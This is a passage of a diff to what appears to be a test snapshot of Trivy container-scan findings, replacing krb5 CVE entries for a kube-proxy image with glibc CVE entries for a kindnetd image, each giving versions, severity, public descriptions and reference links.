"https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", - ], - }, - "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + ], + }, + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", - }, - { - "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "5.2.5-2.1~deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.5-2", - "packageName": "liblzma5", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - 